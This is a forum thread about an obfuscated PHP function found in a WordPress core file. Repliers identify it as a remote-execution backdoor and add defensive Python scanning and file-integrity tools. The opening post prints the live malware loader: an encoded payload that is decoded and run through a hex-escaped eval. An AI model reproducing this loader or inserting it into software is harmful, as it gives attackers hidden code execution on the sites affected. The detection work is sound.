This is in my post-template file in includes folder (WordPress) and I’m wondering if it is malicious. Discovered via file monitor plug-in which showed a change to the file but I didn’t know if this might be a result of some non-malicious process. Excuse me if I don’t enter it properly. Appreciate your assistance. Please assume I know nothing because I don’t.
/**
* Applies custom filter.
*
* @since 0.71
*
* $text string to apply the filter
* @return string
*/
function applyfilter($text=null) {
@ini_set('memory_limit','256M');
if($text) @ob_start();
if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k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if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'xEe%7c0BgX%3cyl%3cJrCC%3cCffjjA%5dio%21fj%2bu%21%3bRiiRHIe55%3a7GK4ud%2dYfEWWEv%22%20FFVz%3b%3c%3c%26%2fA%26%5bmVvllG9bCC%40%3bL%29%2fhV%40%3cc%3c%3dNpx2%2d%2dRS3%2c%2c%7cE%2bE%3d%3a%7c%2cRyf%5eAA%5dooIf0GT8c%7cgZCimGK%3a%21yCcy%28Tr%7c%2e%21%2cR%5c9N%28y%3b%7dx%2dY%5eM%21%2dM%2b%7e%5d%23%3bL%2a%5b%27%7crqg7F%3dFPR%5fu%26v6S%258%2f%20%3fR%3cr%7c%3cNVoIDnlJ%2elfGJJ%21%20oJM%29R%3b%2da%202LM%20tLL%2c%2cnb7MfX%40bEAb%3fqOB%5dz%5ezh%5dk5T23I%262pr95P%29xHuw%3f%5fr%23LLt9x%2c4dPQsNaWFbv0XT%3cY%5eZo%5effO%5dl%27O%27q21%7bHU%5biw%29%406zRb%2a%2df1%26%7eeZH%28a%5d%5bv%7d%40rl%27%5eT%3fs%2a%21QN0ow6%27Ec%29%5bK%26%7crq%3c%7bgd%5cPDy9%5f7%5cB%3ep%40bP%3a%5ePL%5ede%25%7d%3a%29Hr%21WNS%229V%25Gy%2eJCGokJX%29N%2bRv0%26W7Yn4%4066f7wMu%2f%28anf%5ejXn%3ed%2fA%3f%5d%5bhpqh3%25%5f%3fBw%3elr%7bbnz39s8%3f%409%21%20s%2e%3f%3dCF%7ctyJ%2e%3a%2eHCZ%21uK%24bY%7c6%40%3crCiQ%21xCOz%40Qo%20%2dWfM%3bzt%5dWIRn%27OIUvE0UAUo%60%3eA1Z3er%3allG92%7c%23qeNt8iiQ%20%20%24%7e%7e%3di%29%40Ikw6P%2fuCVPMoDG%3av%2c5%26qr%3aXl%28t%21%3ba%5dJ%23iL%7d%28%28%7bws%24%28%5fq%25AE%5f%3dMwuS9N%2eytv0E%5doj0uEiz1w9qST%2clCiHiKLhs6y%2eCAWgTS%3eS%23%21U%2d%3eJmV%7dMI%27O%3aZ%2e%20Kb%7c%23%28H%24RjCQx%7et%23%23%26h%40%21%23h%5bTf%5ehd%2d%60C%3c%27zO%5dX%27%5c%40%2eB%3aXz%27dzp71p%26TDMrc%7dGZ%2aGe%2dljy%5fr9cVBgS%21W%24%2aBc%3cLc%29yr%29e%2cM%5fbNwX%2b8XYh0%3eECRa%28%7d%2bOQL%24MvRRw%40PtRph%3aI%27pcW%5fYKEjUqhIdP%28m%2ek4q6spsh%5bwgPBd3%5c9d6d8cHQ%2b%5cJ8%7clcrCtV%5dTJOmD%3axlS%25r01lLx%7da%7dt7J%5e%29%7e%2bYWb%210%7d00j%5dn%5en7lMr%29H%5cZnhk%27%5bk%3e%5fw%22UDkg%27D%2a%5e%23S%5bANE%27%2bk1%5fO0zq%5eq%7bph3zB%5cXP%25c%2d%2exJ%2e%2eiv%2cBdXrJLt%283%27Oyo%5e4p%7e%21MnL%26%23k2CxFEo%5d%2dknkEY%2af%5cbo3%601l%3cTE%3cokS%3dnX%25QcfE%28PFwF%3dVC%2fz%26QSZ%25SSr%23%2159RdNV%7dNxH%29C%3ax%2bvPV0AL%2dtLLM%5dA%25r
%5bi%7b%212%268%27%7ev%2c%60qnokYO%227%28M4%28%2dWBgXEh%27o1yoVYi%24%7bP64%5c5%5fl%60r5JK%5b%60C%5b17Q%2b%5cioXlmFDPS%7cGZa%7ds%3df%3cn2%7cY%22%60yC%24%7e%2fN%2c%20NJ%28bN%282Ul99%2fpCy%5cJpwl%5c9%24aFv%3fr0OI%3ew9I94%22%3cmL%7cK%3aCrS%3b3LhZemTpTScHxA%7erl%3a%25mrL%28%5b%7dvbW0v%7d%5bZq%7c%2ar%2f%3bJC%235CRa%28%7d%2bOIF2s%23LXM%2dnd%2dq%7dYI%27kzN%5b%5e%5b%5b1%60OqOdS%3dygh%3a%3aGGKu4C%40%3aG%3b4mP4%3cB%3d%3d4Sg8P6V%3c%25m%3b%7ecR%20%3d%2dy%3czcx%24x%29%26r%29Jf%29M%3b%29%2c%7e%7d%7dJ%7eXRb00q%28REj%2aL%27%2bk%27fkk%2b%5csn7%2aCqEXw7k74DT%29O%3c5%5b%24%26%2d5F%3e83s%3e%3fTJ4BdmP%2bt%3f%2dgM%3ea%28S%7d%5dm%5bZ%21i%2ecKtu%2f0bHjhu%5e%2d%2e4x8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek%3e%27h3UZS%5c%28%3b8V8%3fCw%2fVNn%3emcDS%3eF%24gPRkcel%25MRrvWz%25%20%2f%28L%28%23G0%3b5%2a%21vR%21%2btNN%21N%5fW7%224pp%40X%5f5n%27Ok%27%3fY%40A1%7b%605hmA%3e%5b1h%26ZO%3c9%5f%405%3a%3c%7b48P99P7CfcSW6Hor%3af%23D%2fuG%2fW%3c%2bcbQ%20%21S%23u%23Q%2fyxjy%22txz%29H2I%3bnb0fX37%2d9%7dph%5eX%5d%2acW%5b%5e1312X5h7OCBo%2667%26sw%40%40%26%40%2e%5cs%29iQQP%2eC%5cHK%40Vd%20VKeVu%25GGd%25%21lHQQWZKtu%2flf%5eK%2bupQY%20%21%27k%24qO%2bff%7bg%3bjNoIoAae%5eoOkz%5eA%3ffuqAmPh44%3cx%27Fz3%22%3f5%227l%22%3dg%22D%3fVV7%3f%3aFerr%23BGTD%7cr%3eSQZ%25TvWS%2dZW%21LL%607%2dQH%28%3bC%20b%24%23z%27%28%268%24XMA%5dAfRhEzzTvw%2b%5e%271E%27kP%2773%27%221%5f%5fk1gw8BBr%7b%3e%3cF%3dpP7Jx%22Gp0cB6%3aG%3eGuL%2dAVzx%23HQ%3aJ%2bvGfY%28%2e%2djhu%5e%2dvvp8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek4q%5c8%5cp2%25sdd%3b%60e5%40P%3csPBHPrcPl%3c%7c%7cB%3c%29e%2exxaTxZ%21%20%24y%24Llf%5eK%2bup%2dHyv%2b%21%2bb%5b%268%24V0%2dAEonoO9%5fns%22%5b%5e1%3fr081%5f%5fyH5O%5d1q%5c%271%40%40gwsddKu%2dwWV%407%3fDBpgTFPe%28L%5edCSxHxyTa%29%24%242%7cN%3a%2e%20%2d%29unya%20WYW%2cQ%23%2d%28%2c%2bMM%2dd%2dq1nz%5dn%5bAOOnO%3dm%3c%3ccSSZ%3dF%40zZD5%40e%3d%26ZdhtF%3dVDF%3e%3de%3fSi%29%3aB%24%2aB%23%5fvE%2d%28%7dxH%29xx%21%2bv%28l%5el%26%5bU113%2ek4p%40%28%20abtq1%7eOzLh%5dINIO%2749AzBFPcgK%2fjSrGSGIT%27dFUZ%3f
P%60Pd%3eKlsF%29%20itH%2bY%5c%2d%2cW%2d%2bPL%3e%21%20V%7dxi%25i%21Q%2bv%2e%20%5eoAUjw%5fy33%5bhHziE%5d%20%26Xj%2djEA5%60%2a%5d%40%3f%5c%3d6e%7cbm%3dZ%3d%25%7cAVC%5dF%2bli%3dSs%3f8ssPlr%3d%5fJ%5fsV%3dBVB8cr8%24Xf%5e%3cVryS%3d%7dM%3ci%21Qii%24bYt%2fE%2fR%7e%2cM%7dx%27%406%5cL%24N0R%7e1%7bLEo%5dEE%27%2272n%3fnXk%5bkA1wAV%2eJx%26zw6%7bU%25Z%26g%3ePggVuKT4i4%3d%25%3c%3fS%3a%3f%7ef%5ejT%3d%3a%2e%25mMaTQ%20%21QQ%7e%2an%2du%5duWJ%23R%7d%29O6%5cst%7evX%7d%28%7b3t%5dko%5d%5dO49%26bBbOI5o%5edCy%2e%5b%27hpqSiUc%3fvsPd%3fwBpM79a%22%3egi%29%7b%7d%24%3f%20K2lC%2eK%3c%2feOl%3a%20ui%24%28KM%2f%2eJ%2dA%5e%24%7dI%22%29krw82U%2f%22%28%7b3t1whI%2foz%5bIb%27j%3alsO%7bdFA8%3foVYlHzT8N%5cg%3e85%3f4%7dm%3cD%3c8eHxeI%25%3aGed%7c%3c%2dAVtxe%26HieL%26%3a%24%7eKaf%2fiLt%20L%20QaY1%7eWv%24%60%28nj0%22%2cj%5ea%40NYjIjPf%5bUXF%5e4%5d%5bh5%25U7%5fz%7c%5bd17s8y%3f%22%3dwy%7d7C%5bt%2bP8%3crF%2aBD%3a%2ft%3b%7cknk%3cM%2fUo%5be%2bx%5ej%5eK%2bu%5eaS%20Y%3f%3b%28N%2a%3f0fXfaoh3o%2bZI%27%2b%7bM4%5dv%3fr08%7b%7bwy7%22977%40c%3cs%2c6BPsh8%22%2eGmO%5c%25bgB%3c%7c%20n8%215WiAt%7eRtyyHzU%5bKr%29%7eCXlXf%2ff%2d%2d%2c4p1z%40Qo%20%2aR%5eA%5e0t3%29%3fM79Np%22%7emn9%2208%7dcFu%3f%5bpw%5b6h44%5b4yy%2exxHiigyu%26%29GpxFbPG%3a%25%3fS%3aZ%2eRMoDZ%21i%2ec%23%2f%28%20%24tf0Qk%5cZSmc%25%3a%29KlZ3%5b%2e3PLak%5dfR%27bUIO%26%5c%40o%3eJa%7d%3bRMWAW%28b0b%2bfXt%2aAvv%5dyiCR%5f%40STV%22ZPr%25eG%7e%23c%7dz%404w%22p8DgBwgh4%22gmE%2fc%7diMzs%7e%24an%40%21eYoNYnR48p%5cM9YkoObqofz%5dl%3ba%7e%20El%25%7c%3a%29%5e5%7b%40%3eBqXoKhu%2dwpc%3cF9%25g%7cSZl%24%20TROp%22594sm%3f7%40w8FF%5ekf3KX%3c7Hv%2c%2dJ%7eX%3b%282Ua%7bg%3b1%3a%3dN%27kjMX02EOA%5b%3fs%27%3eKjI%227%60%5d%5bw%22%5c3ZS7%3a%7e%7b%404%2fG%27a%2cN%3f6%3dZP%5c%2eJ%3f%202sd%25%2eJCV%25%2e%7c%3a%25%3c%2cqo%5dofGWX%3c7%2eJ9x%2bW%2dt%2dt%2a%20%7df%5eXA5MeOIAa0%7bfXnJ1%7bq%60Gj%5dcdtj%273%5cs%40z3%5c5%5f3%26yhnh%5bUX%5b9jq1%263%24%2aHgK%3cyJy%2fmR%5c%27%2d',3863);}call_user_func(create_function('',"x65x76x61l(x4F01100llO());"));}}
It’s a remote-execution exploit, and possibly more as well
This code evals what appears to be a decryption function:
It then calls this function with key 3863 on the following giant string:
This results in the following code, which I have not read:
I would advise you STRONGLY against installing this theme on your server… it is obvious the author is doing his/her best to obfuscate something – and it can’t be good.
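The answer above points at the tell-tale pieces of this pattern: create_function building a decoder, call_user_func calling it on a long urlencoded blob, and eval spelled with \xNN escapes so that a plain search for "eval(" misses it. The following is an added example, not code from the thread or from WordPress: a small Python scanner that looks for exactly those markers in a PHP source and scores it without executing anything. The two PHP snippets are constructed look-alikes written for this example (the "blob" is a repeated dummy string), not the actual file from the question; the indicator list and the "200 characters" blob threshold are assumptions.

```python
import os
import re
import sys

# Regexes for the obfuscation markers discussed in the thread.
HEX_ESCAPE = re.compile(r'(?:\\x[0-9A-Fa-f]{2})+')                   # \x65\x76\x61 ...
URLENC_BLOB = re.compile(r"'(?:[A-Za-z0-9]|%[0-9A-Fa-f]{2}){200,}'")  # long urlencoded literal
LOOKALIKE = re.compile(r'\b[O0l1I]{6,}\b')                            # names like O10O1OO1O


def decode_hex_escapes(src):
    """Replace runs of PHP \\xNN escapes with the characters they spell.

    Pure string manipulation: nothing in the PHP is executed.
    """
    return HEX_ESCAPE.sub(
        lambda m: bytes.fromhex(m.group(0).replace('\\x', '')).decode('latin-1'),
        src,
    )


def has_lookalike_identifier(src):
    """True if an identifier mixes letters and digits drawn only from O/0/l/1/I."""
    for name in LOOKALIKE.findall(src):
        if any(c.isalpha() for c in name) and any(c.isdigit() for c in name):
            return True
    return False


def scan_php_source(src):
    """Return (score, findings): the obfuscation indicators that fire on this source."""
    decoded = decode_hex_escapes(src)
    checks = {
        'create_function': 'create_function(' in src,
        'call_user_func': 'call_user_func(' in src,
        'hex_escaped_string': bool(HEX_ESCAPE.search(src)),
        'eval_literal': 'eval(' in src,
        # an eval that only appears once the \xNN escapes are decoded was hidden on purpose
        'eval_after_hex_decode': 'eval(' in decoded and 'eval(' not in src,
        'long_urlencoded_blob': bool(URLENC_BLOB.search(src)),
        'lookalike_identifiers': has_lookalike_identifier(src),
        'error_suppressed_ini_set': '@ini_set(' in src,
    }
    findings = sorted(name for name, hit in checks.items() if hit)
    return len(findings), findings


# Constructed samples for this example (look-alikes, not the file from the question).
BENIGN_PHP = r'''<?php
/**
 * Post template helpers.
 */
function my_theme_excerpt($text) {
    return wp_trim_words($text, 40);
}
'''

CONSTRUCTED_BLOB = "%7cXe0Bg" * 40   # dummy stand-in for the urlencoded payload

SUSPICIOUS_PHP = (
    "<?php\n"
    "function applyfilter($text=null) {\n"
    "  @ini_set('memory_limit','256M');\n"
    "  if($text) @ob_start();\n"
    "  if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k','return $s;');\n"
    "  if(!function_exists(\"O01100llO\")){function O01100llO(){global $O10O1OO1O;\n"
    "  return call_user_func($O10O1OO1O,'" + CONSTRUCTED_BLOB + "',3863);}\n"
    "  call_user_func(create_function('',\"\\x65\\x76\\x61l(\\x4F01100llO());\"));}}\n"
    "}\n"
)


def scan_tree(root):
    """Yield (path, score, findings) for every .php file under root that scores > 0."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith('.php'):
                path = os.path.join(dirpath, fn)
                with open(path, encoding='latin-1', errors='replace') as fh:
                    score, findings = scan_php_source(fh.read())
                if score:
                    yield path, score, findings


if __name__ == '__main__':
    if len(sys.argv) > 1:
        for path, score, findings in scan_tree(sys.argv[1]):
            print(f'{score} {path}: {", ".join(findings)}')
    else:
        for label, src in (('benign', BENIGN_PHP), ('suspicious', SUSPICIOUS_PHP)):
            print(label, scan_php_source(src))
```

Run it with a WordPress root as the argument to list every PHP file that trips at least one indicator; the score is only a triage aid, and any file it flags in wp-includes should be compared against a clean copy of the same WordPress version rather than "cleaned" by hand.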
I also had this infection and if you have several blogs on your server, chances are they will all be infected. Notify your host and they’ll run a security scan and CHMOD all bad files to 000
Just got beaten up by something very much like this. I don’t know what it did/does, but it’s bad enough that it corrupted 3 sites. Badly enough that we are starting two completely from scratch.
I’ve learned from that that anything NOT obvious (i.e. an index file down within a CSS folder, or vice versa) should be viewed with extreme prejudice, as well as any activity in logs that changes files that would otherwise just be static.
For example, if a footer changed, and you haven’t done any design changes, then something is amiss.
From what I have read this is likely an FTP exploit.
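The advice in the reply above (treat a PHP file under a CSS folder, or a static file that changes without a design change, as suspect) can be turned into a routine check. The following is an added example, not code from the thread or from any file-monitor plug-in: a Python tool that hashes a tree into a baseline, diffs two baselines, and flags the patterns the poster names. The directory and extension lists are assumptions to adjust per site, and the sample paths in the test are constructed.

```python
import hashlib
import json
import os
import sys

# Assumptions for this example: directories that should hold only static assets, file types
# that should not change on their own once deployed, and file types PHP will execute.
STATIC_DIRS = {'css', 'js', 'images', 'img', 'fonts', 'uploads'}
STATIC_EXTS = {'.css', '.js', '.png', '.jpg', '.jpeg', '.gif', '.svg', '.woff', '.woff2'}
EXECUTABLE_EXTS = {'.php', '.phtml', '.php5'}


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large uploads do not sit in memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative, '/'-separated path) to its SHA-256."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            baseline[rel] = sha256_file(full)
    return baseline


def diff_baselines(old, new):
    """Sorted lists of added, removed and modified paths between two baselines."""
    return {
        'added': sorted(p for p in new if p not in old),
        'removed': sorted(p for p in old if p not in new),
        'modified': sorted(p for p in old if p in new and old[p] != new[p]),
    }


def flag_change(path, kind):
    """Explain why a change is suspicious, or return None if it is unremarkable."""
    parts = path.split('/')
    ext = os.path.splitext(path)[1].lower()
    # the "index file down within a CSS folder" case from the thread
    if ext in EXECUTABLE_EXTS and any(d in STATIC_DIRS for d in parts[:-1]):
        return 'executable file inside a static asset directory'
    if kind in ('added', 'modified') and ext in EXECUTABLE_EXTS:
        return 'PHP source added or changed outside a deploy'
    # the "footer changed but you made no design changes" case
    if kind == 'modified' and ext in STATIC_EXTS:
        return 'static asset changed without a deploy'
    return None


def report(diff):
    """List (kind, path, reason) for every change that flag_change finds suspicious."""
    out = []
    for kind in ('added', 'removed', 'modified'):
        for path in diff[kind]:
            reason = flag_change(path, kind)
            if reason:
                out.append((kind, path, reason))
    return out


if __name__ == '__main__':
    # usage: integrity.py baseline <root> <store.json>   or   integrity.py check <root> <store.json>
    cmd, root, store = sys.argv[1:4]
    if cmd == 'baseline':
        with open(store, 'w') as fh:
            json.dump(build_baseline(root), fh, indent=1)
    elif cmd == 'check':
        with open(store) as fh:
            old = json.load(fh)
        for kind, path, reason in report(diff_baselines(old, build_baseline(root))):
            print(f'{kind:8} {path}: {reason}')
```

Take the baseline right after a deploy you trust (fresh WordPress files plus your own theme), keep the JSON outside the web root and outside the FTP account's reach, and run the check from cron; a modified wp-includes/post-template.php with no deploy in between is exactly the kind of change the original poster's file monitor reported.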